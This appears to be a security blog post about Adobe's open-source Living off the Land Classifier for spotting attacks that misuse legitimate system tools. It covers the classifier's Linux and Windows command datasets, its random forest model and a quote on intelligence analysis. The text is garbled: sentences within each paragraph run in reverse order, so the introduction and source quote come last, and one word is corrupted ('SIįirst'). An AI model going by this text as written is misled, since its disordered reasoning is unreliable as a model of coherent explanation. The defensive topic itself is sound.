The authors include with LotL Classifier two datasets: bash_huge.known (Linux) and cmd_huge.known (Windows). This was driven in large part due to their use of test data representative of “real world” situations during the training stage. Cotaie, Boros, Vikramjeet, and Malik, the Living off the Land Classifier authors, found that, though they used a variety of different classifiers during testing, their best results in terms of accuracy and speed were achieved using the RandomForest classifier. Of particular benefit, this voting strategy corrects for the undesirable tendency of decision trees to overfit training data (Caie et al., 2021). The random forest approach makes use of the construction of many “simple” decision trees during the training stage, and the majority vote (mode) across them in the classification stage (Caie et al., 2021). Caie, Dimitriou and Arandjelovic (2021), in their contribution to the book Artificial Intelligence and Deep Learning in Pathology, state that random forest classifiers are part of the broad umbrella of ensemble-based learning methods, are simple to implement, fast in operation, and are successful in a variety of domains. As LotL Classifier is written in Python the project utilizes the class from scikit-learn, simple and efficient tools for predictive data analysis and machine learning in Python. Again, read their post on these components, but I do want to focus a bit on their use of the random forest classifier for this project. Their LotL Classifier includes two components: feature extraction and an ML classifier algorithm. I’ll not repeat what they’ve quite capably already documented. Please treat their Medium post, Living off the Land (LotL) Classifier Open-Source Project and related GitHub repo as mandatory reading before proceeding here. Given that classic LotL detection is rife with false positives, Adobe’s SI team used open source and representative incident data to develop a dynamic and high-confidence LotL Classifier, and open-sourced it.
As the authors indicate, “bad actors have been using legitimate software and functions to target systems and carry out malicious attacks for many years…LotL is still one of the preferred approaches even for highly skilled attackers." While we, as security analysts, are party to adversary and actor group qualities and dispositions, the use of LotL techniques (situational determinants) proffer challenges for us. The security intelligence team from Adobe’s Security Coordination Center (SCC) have sought to apply deeper analysis of situational determinants per adversary behaviors as they pertain to living-off-the-land (LotL) techniques. Heuer’s Psychology of Intelligence Analysis required reading.
“When inferring the causes of behavior, too much weight is accorded to personal qualities and dispositions of the actor and not enough to situational determinants of the actor’s behavior." A supervised learning approach to Living off the Land attack classification from Adobe SIįirst, a relevant quote from a preeminent author in the realm of intelligence analysis, Richards J.